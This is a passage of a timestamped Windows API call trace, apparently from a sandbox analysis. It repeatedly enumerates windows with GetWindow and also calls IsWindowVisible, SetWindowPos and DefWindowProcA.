uCmd=0x2) returned 0x10174 [0057.615] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.615] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.615] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.615] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.615] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.615] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.615] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.615] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.615] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.615] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.615] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.615] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.615] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.615] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.615] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.615] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.615] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.615] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.615] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.615] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.615] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.615] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.615] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.615] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.615] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.615] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.615] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.615] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.616] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.616] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.616] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.616] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.616] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.616] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.616] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.616] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.616] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.616] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.616] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.616] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.616] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.616] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.616] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.616] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.616] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.616] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.616] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.616] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.616] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.616] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.616] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.616] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.616] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.616] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.616] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.616] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.616] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.616] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.617] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.617] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.617] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.617] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.617] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.617] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.617] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.617] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.617] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.617] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.617] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.617] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.617] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.617] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.617] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.617] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.617] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.617] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.617] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.617] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.617] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.617] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.617] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.617] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.617] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.617] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.617] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.617] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.618] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.618] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.618] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.618] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.618] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.618] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.618] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.618] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.618] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.618] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.618] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.618] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.618] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.618] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.618] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.618] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.618] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.618] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.618] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.618] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.618] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.618] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.618] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.618] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.618] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.618] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.618] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.618] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.618] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.619] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.619] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.619] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.619] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.619] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.619] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.619] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.619] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.619] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.619] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.619] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.619] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.619] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.619] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.619] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.619] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.619] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.619] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.619] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.619] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.619] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.619] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.619] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.619] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.619] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.619] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.620] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.620] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.620] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.620] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.620] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.620] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.620] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.620] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.620] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.620] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.620] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.620] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.620] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.620] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.620] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.620] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.620] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.620] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.620] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.620] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.620] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.620] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.620] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.620] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.621] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.621] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.621] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.621] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.621] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.621] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.621] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.621] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.621] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.621] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.621] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.621] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.621] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.621] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.621] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.621] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.621] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.621] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.621] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.621] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.621] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.621] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.621] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.621] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.621] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.622] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.622] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.622] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.622] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.622] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.622] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.622] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.622] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.622] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.622] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.622] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.622] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.622] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.622] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.622] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.622] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.622] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.622] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.622] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.622] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.622] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.622] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.622] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.622] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.622] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.623] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.623] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.623] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.623] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.623] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.623] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.623] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.623] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.623] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.623] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.623] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.623] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.623] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.623] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.623] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.623] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.623] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.623] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.623] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.623] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.623] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.623] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.623] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.623] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.623] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.623] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.623] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.623] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.623] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.623] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.623] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.623] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.623] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.624] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.624] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.624] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.624] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.624] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.624] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.624] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.624] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.624] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.624] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.624] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.624] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.624] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.624] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.624] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.624] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.624] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.624] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.624] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.624] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.624] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.624] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.624] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.624] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.624] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.624] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.624] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.624] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.624] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.624] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.624] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.625] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.625] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.625] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.625] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.625] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.625] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.625] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.625] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.625] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.625] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.625] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.625] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.625] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.625] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.625] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.625] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.625] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.625] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.625] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.625] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.625] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.625] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.625] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.625] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.625] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.625] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.625] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.625] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.625] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.625] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.625] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.625] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.626] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.626] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.626] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.626] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.626] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.626] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.626] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.626] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.626] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.626] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.626] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.626] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.626] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.626] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.626] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.626] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.626] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.626] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.626] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.626] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.626] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.626] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.626] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.626] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.626] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.626] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.626] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.626] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.627] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.627] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.627] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.627] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.627] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.627] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.627] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.627] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.627] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.627] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.627] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.627] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.627] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.627] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.627] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.627] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.627] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.627] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.627] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.627] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.627] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.627] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.627] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.627] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.627] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.627] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.627] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.627] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.627] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.627] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.627] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.628] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.628] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.628] GetWindow 